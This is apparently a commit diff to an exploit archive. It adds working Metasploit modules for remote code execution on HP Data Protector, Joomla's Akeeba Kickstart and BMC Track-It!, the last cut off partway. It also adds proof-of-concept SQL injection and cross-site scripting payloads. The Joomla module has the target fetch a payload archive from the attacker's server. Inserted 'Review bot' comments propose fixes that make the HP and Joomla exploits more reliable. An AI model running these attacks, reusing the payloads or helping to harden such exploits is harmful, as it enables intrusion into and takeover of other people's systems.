Updated 10_23_2014
This commit is contained in:
parent
a7cf4f066c
commit
6cd4fbf74e
11 changed files with 1137 additions and 0 deletions
10
files.csv
10
files.csv
|
@ -31538,3 +31538,13 @@ id,file,description,date,author,platform,type,port
|
|||
35020,platforms/win32/local/35020.rb,"MS14-060 Microsoft Windows OLE Package Manager Code Execution",2014-10-20,metasploit,win32,local,0
|
||||
35021,platforms/linux/local/35021.rb,"Linux PolicyKit Race Condition Privilege Escalation",2014-10-20,metasploit,linux,local,0
|
||||
35022,platforms/php/webapps/35022.txt,"4homepages 4images 1.7.x 'categories.php' Parameter SQL Injection Vulnerability",2010-11-29,"Ahmed Atif",php,webapps,0
|
||||
35023,platforms/php/webapps/35023.txt,"Wernhart Guestbook 2001.03.28 Multiple SQL Injection Vulnerabilities",2010-11-29,"Aliaksandr Hartsuyeu",php,webapps,0
|
||||
35024,platforms/php/webapps/35024.txt,"Joomla Catalogue Component SQL Injection and Local File Include Vulnerabilities",2010-11-30,XroGuE,php,webapps,0
|
||||
35025,platforms/php/webapps/35025.html,"Car Portal 2.0 'car_make' Parameter Cross Site Scripting Vulnerability",2010-11-29,"Underground Stockholm",php,webapps,0
|
||||
35026,platforms/php/webapps/35026.txt,"Joomla Store Directory 'id' Parameter SQL Injection Vulnerability",2010-11-30,XroGuE,php,webapps,0
|
||||
35027,platforms/php/webapps/35027.txt,"E-lokaler CMS 2 Admin Login Multiple SQL Injection Vulnerabilities",2010-11-26,ali_err0r,php,webapps,0
|
||||
35028,platforms/php/webapps/35028.txt,"SmartBox 'page_id' Parameter SQL Injection Vulnerability",2010-11-26,KnocKout,php,webapps,0
|
||||
35031,platforms/asp/webapps/35031.txt,"BugTracker.NET 3.4.4 SQL Injection and Cross Site Scripting Vulnerabilities",2010-11-30,BugTracker.NET,asp,webapps,0
|
||||
35032,platforms/windows/remote/35032.rb,"Numara / BMC Track-It! FileStorageService Arbitrary File Upload",2014-10-21,metasploit,windows,remote,0
|
||||
35033,platforms/php/remote/35033.rb,"Joomla Akeeba Kickstart Unserialize Remote Code Execution",2014-10-21,metasploit,php,remote,80
|
||||
35034,platforms/multiple/remote/35034.rb,"HP Data Protector EXEC_INTEGUTIL Remote Code Execution",2014-10-21,metasploit,multiple,remote,5555
|
||||
|
|
|
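--- a/platforms/asp/webapps/35031.txt
+++ b/platforms/asp/webapps/35031.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/45121/info
+
+BugTracker.NET is prone to an SQL-injection vulnerability and a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
+
+Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+BugTracker.NET v3.4.4 is vulnerable; other versions may be affected.
+
+http://www.example.com/edit_comment.aspx?id=48&bug_id=3%3E%3Cscript%3Ealert%28%27%27%29;%3C/script%3E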
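--- a/platforms/multiple/remote/35034.rb
+++ b/platforms/multiple/remote/35034.rb
@@ -0,0 +1,354 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+Rank = GreatRanking
+
+include Msf::Exploit::Remote::Tcp
+include Msf::Exploit::Powershell
+
+def initialize(info = {})
+super(update_info(info,
+'Name' => 'HP Data Protector EXEC_INTEGUTIL Remote Code Execution',
+'Description' => %q{
+This exploit abuses a vulnerability in the HP Data Protector. The vulnerability exists
+in the Backup client service, which listens by default on TCP/5555. The EXEC_INTEGUTIL
+request allows to execute arbitrary commands from a restricted directory. Since it
+includes a perl executable, it's possible to use an EXEC_INTEGUTIL packet to execute
+arbitrary code. On linux targets, the perl binary isn't on the restricted directory, but
+an EXEC_BAR packet can be used to access the perl binary, even in the last version of HP
+Data Protector for linux. This module has been tested successfully on HP Data Protector
+9 over Windows 2008 R2 64 bits and CentOS 6 64 bits.
+},
+'Author' =>
+[
+'Aniway.Anyway <Aniway.Anyway[at]gmail.com>', # vulnerability discovery
+'juan vazquez' # msf module
+],
+'References' =>
+[
+[ 'ZDI', '14-344']
+],
+'Payload' =>
+{
+'DisableNops' => true
+},
+'DefaultOptions' =>
+{
+# The powershell embedded payload takes some time to deploy
+'WfsDelay' => 20
+},
+'Targets' =>
+[
+[ 'Linux 64 bits / HP Data Protector 9',
+{
+'Platform' => 'unix',
+'Arch' => ARCH_CMD,
+'Payload' => {
+'Compat' => {
+'PayloadType' => 'cmd cmd_bash',
+'RequiredCmd' => 'perl gawk bash-tcp openssl python generic'
+}
+}
+}
+],
+[ 'Windows 64 bits / HP Data Protector 9',
+{
+'Platform' => 'win',
+'Arch' => ARCH_CMD,
+'Payload' => {
+'Compat' => {
+'PayloadType' => 'cmd',
+'RequiredCmd' => 'powershell'
+}
+}
+}
+]
+],
+'DefaultTarget' => 0,
+'Privileged' => true,
+'DisclosureDate' => 'Oct 2 2014'
+))
+
+register_options(
+[
+Opt::RPORT(5555)
+], self.class)
+end
+
+def check
+fingerprint = get_fingerprint
+
+if fingerprint.nil?
+return Exploit::CheckCode::Unknown
+end
+
+if fingerprint =~ /Data Protector A\.(\d+\.\d+)/
+version = $1
+vprint_status("#{peer} - Windows / HP Data Protector version #{version} found")
+elsif fingerprint =~ / INET/
+vprint_status("#{peer} - Linux / HP Data Protector found")
+return Exploit::CheckCode::Detected
+else
+return Exploit::CheckCode::Safe
+end
+
+if Gem::Version.new(version) <= Gem::Version.new('9')
+return Exploit::CheckCode::Appears
+end
+
+Exploit::CheckCode::Detected # there is no patch at the time of module writing
+end
+
+def exploit
+rand_exec = rand_text_alpha(8)
+print_status("#{peer} - Leaking the HP Data Protector directory...")
+leak = leak_hp_directory(rand_exec)
+dir = parse_dir(leak, rand_exec)
+
+if dir.nil?
+dir = default_hp_dir
+print_error("#{peer} - HP Data Protector dir not found, using the default #{dir}")
+else
+unless valid_target?(dir)
+print_error("#{peer} - HP Data Protector directory leaked as #{dir}, #{target.name} looks incorrect, trying anyway...")
+end
+end
+
+if target.name =~ /Windows/
+#command = cmd_psh_payload(payload.encoded, payload_instance.arch.first, {:remove_comspec => true, :encode_final_payload => true})
+print_status("#{peer} - Executing payload...")
+execute_windows(payload.encoded, dir)
+else
+print_status("#{peer} - Executing payload...")
+execute_linux(payload.encoded, dir)
+end
+end
+
+def peer
+"#{rhost}:#{rport}"
+end
+
+def build_pkt(fields)
+data = "\xff\xfe" # BOM Unicode
+fields.each do |v|
+data << "#{Rex::Text.to_unicode(v)}\x00\x00"
+data << Rex::Text.to_unicode(" ") # Separator
+end
+
+data.chomp!(Rex::Text.to_unicode(" ")) # Delete last separator
+return [data.length].pack("N") + data
+end
+
+def get_fingerprint
+fingerprint = get_fingerprint_windows
+if fingerprint.nil?
+fingerprint = get_fingerprint_linux
+end
+
+fingerprint
+end
+
+def get_fingerprint_linux
+connect
+
+sock.put([2].pack("N") + "\xff\xfe")
+begin
+res = sock.get_once(4)
+rescue EOFError
+disconnect
+return nil
+end
+
+if res.nil?
+disconnect
+return nil
+else
+length = res.unpack("N")[0]
+end
+
+begin
+res = sock.get_once(length)
+rescue EOFError
+return nil
+ensure
+disconnect
+end
+
+if res.nil?
+return nil
+end
+
+res
+end
+
+def get_fingerprint_windows
+connect
+
+sock.put(rand_text_alpha_upper(64))
+begin
+res = sock.get_once(4)
+rescue ::Errno::ECONNRESET, EOFError
+disconnect
+return nil
+end
+
+if res.nil?
+disconnect
+return nil
+else
+length = res.unpack("N")[0]
+end
+
+begin
+res = sock.get_once(length)
+rescue EOFError
+return nil
+ensure
+disconnect
+end
+
+if res.nil?
+return nil
+end
+
+Rex::Text.to_ascii(res).chop.chomp # Delete unicode last null
+end
+
+def leak_hp_directory(rand_exec)
+connect
+pkt = build_pkt([
+"2", # Message Type
+rand_text_alpha(8),
+rand_text_alpha(8),
+rand_text_alpha(8),
+rand_text_alpha(8),
+rand_text_alpha(8),
+"28", # Opcode EXEC_INTEGUTIL
+rand_exec,
+])
+
+sock.put(pkt)
+begin
+res = sock.get_once(4)
+rescue EOFError
+disconnect
+return nil
+end
+
+if res.nil?
+disconnect
+return nil
+else
+length = res.unpack("N")[0]
+end
+
+begin
+res = sock.get_once(length)
+rescue EOFError
+return nil
+ensure
+disconnect
+end
+
+if res.nil?
+return nil
+end
+
+if res =~ /No such file or directory/ # Linux signature
+return res
+else # deal as windows target
+return Rex::Text.to_ascii(res).chop.chomp # Delete unicode last null
+end
+end
+
+def parse_dir(data, clue)
+if data && data =~ /The system cannot find the file specified\..*(.:\\.*)bin\\#{clue}/
+dir = $1
+print_good("#{peer} - HP Data Protector directory found on #{dir}")
+elsif data && data =~ /\]\x00 (\/.*)lbin\/#{clue}\x00 \[\d\] No such file or directory/
+dir = $1
+print_good("#{peer} - HP Data Protector directory found on #{dir}")
+else
+dir = nil
+end
+
+dir
+end
+
+def valid_target?(dir)
+if target.name =~ /Windows/ && dir =~ /^[A-Za-z]:\\/
+return true
+elsif target.name =~ /Linux/ && dir.start_with?('/')
+return true
+end
+
+false
+end
+
+def default_hp_dir
+if target.name =~ /Windows/
+dir = 'C:\\Program Files\\OmniBack\\'
+else # linux
+dir = '/opt/omni/lbin/'
+end
+
+dir
+end
+
+def execute_windows(cmd, hp_dir)
+connect
+pkt = build_pkt([
+"2", # Message Type
+rand_text_alpha(8),
+rand_text_alpha(8),
+rand_text_alpha(8),
+rand_text_alpha(8),
+rand_text_alpha(8),
+"28", # Opcode EXEC_INTEGUTIL
+"perl.exe",
+"-I#{hp_dir}lib\\perl",
+"-MMIME::Base64",
+"-e",
+"system(decode_base64('#{Rex::Text.encode_base64(cmd)}'))"
+])
+sock.put(pkt)
+disconnect
+end
+
+def execute_linux(cmd, hp_dir)
+connect
+pkt = build_pkt([
+'2', # Message Type
+rand_text_alpha(8),
+rand_text_alpha(8),
+rand_text_alpha(8),
+rand_text_alpha(8),
+rand_text_alpha(8),
+'11', # Opcode EXEC_BAR
+rand_text_alpha(8),
+rand_text_alpha(8),
+rand_text_alpha(8),
+rand_text_alpha(8),
+rand_text_alpha(8),
+rand_text_alpha(8),
+rand_text_alpha(8),
+rand_text_alpha(8),
+rand_text_alpha(8),
+rand_text_alpha(8),
+rand_text_alpha(8),
+"../bin/perl",
+rand_text_alpha(8),
+"-I#{hp_dir}lib/perl",
+'-MMIME::Base64',
+'-e',
+"system(decode_base64('#{Rex::Text.encode_base64(cmd)}'))"
+])
+sock.put(pkt)
+disconnect
+end
+end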
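Review bot: get_fingerprint_linux rescues only EOFError around its first sock.get_once(4), whereas get_fingerprint_windows rescues ::Errno::ECONNRESET as well; since get_fingerprint falls through to the Linux probe on the same port after the Windows probe returned nil, a reset on that second connection propagates out of check instead of yielding nil. Align the clause: `rescue ::Errno::ECONNRESET, EOFError`. leak_hp_directory has the same narrower rescue on its first read. Two smaller points: the commented-out `#command = cmd_psh_payload(...)` line in exploit is dead code and should be deleted, and `dir =~ /^[A-Za-z]:\\/` in valid_target? is line-anchored, so `\A` would anchor the whole leaked string rather than any line of it.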
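--- a/platforms/php/remote/35033.rb
+++ b/platforms/php/remote/35033.rb
@@ -0,0 +1,149 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'rex/zip'
+require 'json'
+
+class Metasploit3 < Msf::Exploit::Remote
+Rank = ExcellentRanking
+
+include Msf::Exploit::Remote::HttpClient
+include Msf::Exploit::Remote::HttpServer::HTML
+include Msf::Exploit::FileDropper
+
+def initialize(info={})
+super(update_info(info,
+'Name' => "Joomla Akeeba Kickstart Unserialize Remote Code Execution",
+'Description' => %q{
+This module exploits a vulnerability found in Joomla! through 2.5.25, 3.2.5 and earlier
+3.x versions and 3.3.0 through 3.3.4 versions. The vulnerability affects the Akeeba
+component, which is responsible for Joomla! updates. Nevertheless it is worth to note
+that this vulnerability is only exploitable during the update of the Joomla! CMS.
+},
+'License' => MSF_LICENSE,
+'Author' =>
+[
+'Johannes Dahse', # Vulnerability discovery
+'us3r777 <us3r777[at]n0b0.so>' # Metasploit module
+],
+'References' =>
+[
+[ 'CVE', '2014-7228' ],
+[ 'URL', 'http://developer.joomla.org/security/595-20140903-core-remote-file-inclusion.html'],
+[ 'URL', 'https://www.akeebabackup.com/home/news/1605-security-update-sep-2014.html'],
+[ 'URL', 'http://websec.wordpress.com/2014/10/05/joomla-3-3-4-akeeba-kickstart-remote-code-execution-cve-2014-7228/'],
+],
+'Platform' => ['php'],
+'Arch' => ARCH_PHP,
+'Targets' =>
+[
+[ 'Joomla < 2.5.25 / Joomla 3.x < 3.2.5 / Joomla 3.3.0 < 3.3.4', {} ]
+],
+'Stance' => Msf::Exploit::Stance::Aggressive,
+'Privileged' => false,
+'DisclosureDate' => "Sep 29 2014",
+'DefaultTarget' => 0))
+
+register_options(
+[
+OptString.new('TARGETURI', [true, 'The base path to Joomla', '/joomla']),
+OptInt.new('HTTPDELAY', [false, 'Seconds to wait before terminating web server', 5])
+], self.class)
+end
+
+def check
+res = send_request_cgi(
+'uri' => normalize_uri(target_uri, 'administrator', 'components', 'com_joomlaupdate', 'restoration.php')
+)
+
+if res && res.code == 200
+return Exploit::CheckCode::Detected
+end
+
+Exploit::CheckCode::Safe
+end
+
+def primer
+srv_uri = "#{get_uri}/#{rand_text_alpha(4 + rand(3))}.zip"
+
+php_serialized_akfactory = 'O:9:"AKFactory":1:{s:18:"' + "\x00" + 'AKFactory' + "\x00" + 'varlist";a:2:{s:27:"kickstart.security.password";s:0:"";s:26:"kickstart.setup.sourcefile";s:' + srv_uri.length.to_s + ':"' + srv_uri + '";}}'
+php_filename = rand_text_alpha(8 + rand(8)) + '.php'
+
+# Create the zip archive
+print_status("Creating archive with file #{php_filename}")
+zip_file = Rex::Zip::Archive.new
+zip_file.add_file(php_filename, payload.encoded)
+@zip = zip_file.pack
+
+# First step: call restore to run _prepare() and get an initialized AKFactory
+print_status("#{peer} - Sending PHP serialized object...")
+res = send_request_cgi({
+'uri' => normalize_uri(target_uri, 'administrator', 'components', 'com_joomlaupdate', 'restore.php'),
+'vars_get' => {
+'task' => 'stepRestore',
+'factory' => Rex::Text.encode_base64(php_serialized_akfactory)
+}
+})
+
+unless res && res.code == 200 && res.body && res.body =~ /^###\{"status":true.*\}###/
+print_status("#{res.code}\n#{res.body}")
+fail_with(Failure::Unknown, "#{peer} - Unexpected response")
+end
+
+# Second step: modify the currentPartNumber within the returned serialized AKFactory
+json = /###(.*)###/.match(res.body)[1]
+begin
+b64encoded_prepared_factory = JSON.parse(json)['factory']
+rescue JSON::ParserError
+fail_with(Failure::Unknown, "#{peer} - Unexpected response, cannot parse JSON")
+end
+
+prepared_factory = Rex::Text.decode_base64(b64encoded_prepared_factory)
+modified_factory = prepared_factory.gsub('currentPartNumber";i:0', 'currentPartNumber";i:-1')
+
+print_status("#{peer} - Sending initialized and modified AKFactory...")
+res = send_request_cgi({
+'uri' => normalize_uri(target_uri, 'administrator', 'components', 'com_joomlaupdate', 'restore.php'),
+'vars_get' => {
+'task' => 'stepRestore',
+'factory' => Rex::Text.encode_base64(modified_factory)
+}
+})
+
+unless res && res.code == 200 && res.body && res.body =~ /^###\{"status":true.*\}###/
+fail_with(Failure::Unknown, "#{peer} - Unexpected response")
+end
+
+register_files_for_cleanup(php_filename)
+
+print_status("#{peer} - Executing payload...")
+send_request_cgi({
+'uri' => normalize_uri(target_uri, 'administrator', 'components', 'com_joomlaupdate', php_filename)
+}, 2)
+
+end
+
+def exploit
+begin
+Timeout.timeout(datastore['HTTPDELAY']) { super }
+rescue Timeout::Error
+# When the server stops due to our timeout, this is raised
+end
+end
+
+# Handle incoming requests from the server
+def on_request_uri(cli, request)
+if @zip && request.uri =~ /\.zip$/
+print_status("Sending the ZIP archive...")
+send_response(cli, @zip, { 'Content-Type' => 'application/zip' })
+return
+end
+
+print_status("Sending not found...")
+send_not_found(cli)
+end
+
+end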
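Review bot: In primer, the failure branch after the first stepRestore request calls `print_status("#{res.code}\n#{res.body}")` although the guard on the line above admits a nil `res`, so a dropped connection raises NoMethodError before fail_with is reached; guard it with `print_status("#{res.code}\n#{res.body}") if res`. `JSON.parse(json)['factory']` is also used without a nil check, and Rex::Text.decode_base64 presumably does not accept nil, so a `fail_with(Failure::Unknown, "#{peer} - No factory in response") if b64encoded_prepared_factory.nil?` after the rescue would turn that case into a clear failure. The second response check later in primer has the same guard shape without the print and is fine as written.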
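--- a/platforms/php/webapps/35023.txt
+++ b/platforms/php/webapps/35023.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/45084/info
+
+Wernhart Guestbook is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+Wernhart Guestbook 2001.03.28 is vulnerable; other versions may also be affected.
+
+http://www.example.com/guestbook/insert.phtml?LastName=' union select 1,2,3,4,5,6/*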
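--- a/platforms/php/webapps/35024.txt
+++ b/platforms/php/webapps/35024.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/45090/info
+
+The Joomla! Catalogue Component is prone to an SQL-injection vulnerability and a local file-include vulnerability because it fails to sufficiently sanitize user-supplied data.
+
+An attacker can exploit these vulnerabilities to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. By using directory-traversal strings to execute local script code in the context of the application, the attacker may be able to obtain sensitive information that may aid in further attacks.
+
+http://www.example.com/index.php?option=com_catalogue&Itemid=73&cat_id=[SQLi]
+
+http://www.example.com/index.php?option=com_catalogue&controller=[LFI]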
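--- a/platforms/php/webapps/35025.html
+++ b/platforms/php/webapps/35025.html
@@ -0,0 +1,32 @@
+source: http://www.securityfocus.com/bid/45092/info
+
+Car Portal is prone to a cross-site-scripting vulnerability because it fails to sufficiently sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+Car Portal 2.0 is vulnerable; other versions may also be affected.
+
+<!--
+TITLE: Car Portal v2.0 "car_make" Cross-Site Scripting Vulnerability
+PRODUCT: Car Portal v2.0
+PRODUCT URL: http://www.netartmedia.net/carsportal/
+RESEARCHERS: underground-stockholm.com
+RESEARCHERS URL: http://underground-stockholm.com/
+-->
+<html>
+<body>
+<form method="post" action="http://[host]/[path]/index.php">
+<input type="hidden" name="ProceedSearch" value="1">
+<input type="hidden" name="mod" value="cars_search">
+<input type="hidden" name="lang" value="en">
+<input type="hidden" name="Step" value="1">
+<input type="hidden" name="car_make" value="<script>alert(1337)</script>">
+<input type="hidden" name="car_model" value="All">
+<input type="hidden" name="car_year_from" value="1983">
+<input type="hidden" name="car_year_to" value="1987">
+<input type="hidden" name="zip" value="">
+<input type="hidden" name="order_by" value="price">
+<input type="submit">
+</form>
+</body>
+</html>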
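--- a/platforms/php/webapps/35026.txt
+++ b/platforms/php/webapps/35026.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/45094/info
+
+Joomla! Store Directory is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+http://www.example.com/index.php?option=com_storedirectory&task=view&id=[SQLi]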
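--- a/platforms/php/webapps/35027.txt
+++ b/platforms/php/webapps/35027.txt
@@ -0,0 +1,12 @@
+source: http://www.securityfocus.com/bid/45098/info
+
+E-lokaler CMS is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+E-lokaler CMS 2 is vulnerable; other versions may also be affected.
+
+The following example inputs are available:
+
+Username: ' or 1=1-- -
+Password: ' or 1=1-- -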
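--- a/platforms/php/webapps/35028.txt
+++ b/platforms/php/webapps/35028.txt
@@ -0,0 +1,8 @@
+source: http://www.securityfocus.com/bid/45101/info
+
+SmartBox is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.
+
+
+A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
+
+http://www.example.com/page.php?page_id=14%20and%20substring%28@@version,1,1%29=5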
538
platforms/windows/remote/35032.rb
Executable file
538
platforms/windows/remote/35032.rb
Executable file
|
@ -0,0 +1,538 @@
|
|||
##
|
||||
# This module requires Metasploit: http//metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
class Metasploit3 < Msf::Exploit::Remote
|
||||
Rank = ExcellentRanking
|
||||
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
include Msf::Exploit::EXE
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Numara / BMC Track-It! FileStorageService Arbitrary File Upload',
|
||||
'Description' => %q{
|
||||
This module exploits an arbitrary file upload vulnerability in Numara / BMC Track-It!
|
||||
v8 to v11.X.
|
||||
The application exposes the FileStorageService .NET remoting service on port 9010
|
||||
(9004 for version 8) which accepts unauthenticated uploads. This can be abused by
|
||||
a malicious user to upload a ASP or ASPX file to the web root leading to arbitrary
|
||||
code execution as NETWORK SERVICE or SYSTEM.
|
||||
This module has been tested successfully on versions 11.3.0.355, 10.0.51.135, 10.0.50.107,
|
||||
10.0.0.143, 9.0.30.248 and 8.0.2.51.
|
||||
},
|
||||
'Author' =>
|
||||
[
|
||||
'Pedro Ribeiro <pedrib[at]gmail.com>' # vulnerability discovery and MSF module
|
||||
],
|
||||
'License' => MSF_LICENSE,
|
||||
'References' =>
|
||||
[
|
||||
[ 'CVE', '2014-4872' ],
|
||||
[ 'OSVDB', '112741' ],
|
||||
[ 'US-CERT-VU', '121036' ],
|
||||
[ 'URL', 'http://seclists.org/fulldisclosure/2014/Oct/34' ],
|
||||
[ 'URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/generic/bmc-track-it-11.3.txt' ]
|
||||
],
|
||||
'DefaultOptions' => { 'WfsDelay' => 30 },
|
||||
'Platform' => 'win',
|
||||
'Arch' => ARCH_X86,
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'Numara / BMC Track-It! v9 to v11.X - Windows', {} ],
|
||||
],
|
||||
'Privileged' => false,
|
||||
'DefaultTarget' => 0,
|
||||
'DisclosureDate' => 'Oct 7 2014'
|
||||
))
|
||||
|
||||
register_options(
|
||||
[
|
||||
OptPort.new('RPORT',
|
||||
[true, 'TrackItWeb application port', 80]),
|
||||
OptPort.new('RPORT_REMOTING',
|
||||
[true, '.NET remoting service port', 9010]),
|
||||
OptInt.new('SLEEP',
|
||||
[true, 'Seconds to sleep while we wait for ASP(X) file to be written', 15]),
|
||||
OptString.new('TARGETURI',
|
||||
[true, 'Base path to the TrackItWeb application', '/TrackItWeb/'])
|
||||
], self.class)
|
||||
end
|
||||
|
||||
|
||||
def get_version
|
||||
res = send_request_cgi!({
|
||||
'uri' => normalize_uri(datastore['TARGETURI']),
|
||||
'method' => 'GET'
|
||||
})
|
||||
if res and res.code == 200 and res.body.to_s =~ /\/TrackItWeb\/Content\.([0-9]{1,2}\.[0-9]{1,2}\.[0-9]{1,2}\.[0-9]{1,4})\//
|
||||
version = $1.split(".")
|
||||
return version
|
||||
end
|
||||
end
|
||||
|
||||
|
||||
def check
|
||||
version = get_version
|
||||
if version != nil
|
||||
if (version[0].to_i < 11) or
|
||||
(version[0].to_i == 11 and version[1].to_i <= 3) or
|
||||
(version[0].to_i == 11 and version[1].to_i == 3 and version[2].to_i == 0 and version[3].to_i < 999)
|
||||
ctx = { 'Msf' => framework, 'MsfExploit' => self }
|
||||
sock = Rex::Socket.create_tcp({ 'PeerHost' => rhost, 'PeerPort' => datastore['RPORT_REMOTING'], 'Context' => ctx })
|
||||
if not sock.nil?
|
||||
sock.write(rand_text_alpha(rand(200) + 100))
|
||||
res = sock.recv(1024)
|
||||
if res =~ /Tcp channel protocol violation: expecting preamble/
|
||||
return Exploit::CheckCode::Appears
|
||||
end
|
||||
sock.close
|
||||
end
|
||||
else
|
||||
return Exploit::CheckCode::Safe
|
||||
end
|
||||
end
|
||||
return Exploit::CheckCode::Unknown
|
||||
end
|
||||
|
||||
|
||||
def longest_common_substr(strings)
|
||||
shortest = strings.min_by &:length
|
||||
maxlen = shortest.length
|
||||
maxlen.downto(0) do |len|
|
||||
0.upto(maxlen - len) do |start|
|
||||
substr = shortest[start,len]
|
||||
return substr if strings.all?{|str| str.include? substr }
|
||||
end
|
||||
end
|
||||
end
|
||||
|
||||
|
||||
def get_traversal_path
|
||||
#
|
||||
# ConfigurationService packet structure:
|
||||
#
|
||||
# @packet_header_pre_packet_size
|
||||
# packet_size (4 bytes)
|
||||
# @packet_header_pre_uri_size
|
||||
# uri_size (2 bytes)
|
||||
# @packet_header_pre_uri
|
||||
# uri
|
||||
# @packet_header_post_uri
|
||||
# packet_body_start_pre_method_size
|
||||
# method_size (1 byte)
|
||||
# method
|
||||
# @packet_body_pre_type_size
|
||||
# type_size (1 byte)
|
||||
# @packet_body_pre_type
|
||||
# type
|
||||
# @packet_terminator
|
||||
#
|
||||
# .NET remoting packet spec can be found at http://msdn.microsoft.com/en-us/library/cc237454.aspx
|
||||
#
|
||||
packet_body_start_pre_method_size = [
|
||||
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
|
||||
0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
|
||||
0x00, 0x15, 0x11, 0x00, 0x00, 0x00, 0x12
|
||||
]
|
||||
|
||||
service = "TrackIt.Core.ConfigurationService".gsub(/TrackIt/,(@version == 11 ? "Trackit" : "Numara.TrackIt"))
|
||||
method = "GetProductDeploymentValues".gsub(/TrackIt/,(@version == 11 ? "Trackit" : "Numara.TrackIt"))
|
||||
type = "TrackIt.Core.Configuration.IConfigurationSecureDelegator, TrackIt.Core.Configuration, Version=11.3.0.355, Culture=neutral, PublicKeyToken=null".gsub(/TrackIt/,(@version == 11 ? "TrackIt" : "Numara.TrackIt"))
|
||||
|
||||
uri = "tcp://" + rhost + ":" + @remoting_port.to_s + "/" + service
|
||||
|
||||
file_storage_dir_str = "FileStorageDataDirectory"
|
||||
web_data_dir_str = "WebDataCacheDirectory"
|
||||
|
||||
packet_size =
|
||||
@packet_header_pre_uri_size.length +
|
||||
2 + # uri_size
|
||||
@packet_header_pre_uri.length +
|
||||
uri.length +
|
||||
@packet_header_post_uri.length +
|
||||
packet_body_start_pre_method_size.length +
|
||||
1 + # method_size
|
||||
method.length +
|
||||
@packet_body_pre_type_size.length +
|
||||
1 + # type_size
|
||||
@packet_body_pre_type.length +
|
||||
type.length
|
||||
|
||||
# start of packet and packet size (4 bytes)
|
||||
buf = @packet_header_pre_packet_size.pack('C*')
|
||||
buf << Array(packet_size).pack('L*')
|
||||
|
||||
# uri size (2 bytes)
|
||||
buf << @packet_header_pre_uri_size.pack('C*')
|
||||
buf << Array(uri.length).pack('S*')
|
||||
|
||||
# uri
|
||||
buf << @packet_header_pre_uri.pack('C*')
|
||||
buf << uri.bytes.to_a.pack('C*')
|
||||
buf << @packet_header_post_uri.pack('C*')
|
||||
|
||||
# method name
|
||||
buf << packet_body_start_pre_method_size.pack('C*')
|
||||
buf << Array(method.length).pack('C*')
|
||||
buf << method.bytes.to_a.pack('C*')
|
||||
|
||||
# type name
|
||||
buf << @packet_body_pre_type_size.pack('C*')
|
||||
buf << Array(type.length).pack('C*')
|
||||
buf << @packet_body_pre_type.pack('C*')
|
||||
buf << type.bytes.to_a.pack('C*')
|
||||
|
||||
buf << @packet_terminator.pack('C*')
|
||||
|
||||
ctx = { 'Msf' => framework, 'MsfExploit' => self }
|
||||
sock = Rex::Socket.create_tcp({ 'PeerHost' => rhost, 'PeerPort' => datastore['RPORT_REMOTING'], 'Context' => ctx })
|
||||
if sock.nil?
|
||||
fail_with(Exploit::Failure::Unreachable, "#{rhost}:#{@remoting_port.to_s} - Failed to connect to remoting service")
|
||||
else
|
||||
print_status("#{rhost}:#{@remoting_port} - Getting traversal path...")
|
||||
end
|
||||
sock.write(buf)
|
||||
|
||||
# read from the socket for up to (SLEEP / 2) seconds
|
||||
counter = 0
|
||||
web_data_dir = nil
|
||||
file_storage_dir = nil
|
||||
while counter < datastore['SLEEP']
|
||||
begin
|
||||
readable,writable,error = IO.select([sock], nil, nil, datastore['SLEEP'] / 2)
|
||||
if readable == nil
|
||||
break
|
||||
else
|
||||
sock = readable[0]
|
||||
end
|
||||
buf_reply = sock.readpartial(4096)
|
||||
if (index = (buf_reply.index(file_storage_dir_str))) != nil
|
||||
# after file_storage_dir_str, discard 5 bytes then get file_storage_dir_size
|
||||
size = buf_reply[index + file_storage_dir_str.length + 5,1].unpack('C*')[0]
|
||||
file_storage_dir = buf_reply[index + file_storage_dir_str.length + 6, size]
|
||||
if file_storage_dir != nil and web_data_dir != nil
|
||||
break
|
||||
end
|
||||
end
|
||||
if (index = (buf_reply.index(web_data_dir_str))) != nil
|
||||
# after web_data_dir_str, discard 5 bytes then get web_data_dir_size
|
||||
size = buf_reply[index + web_data_dir_str.length + 5,1].unpack('C*')[0]
|
||||
web_data_dir = buf_reply[index + web_data_dir_str.length + 6, size]
|
||||
if file_storage_dir != nil and web_data_dir != nil
|
||||
break
|
||||
end
|
||||
end
|
||||
counter += 1
|
||||
sleep(0.5)
|
||||
rescue SystemCallError
|
||||
break
|
||||
end
|
||||
end
|
||||
sock.close
|
||||
|
||||
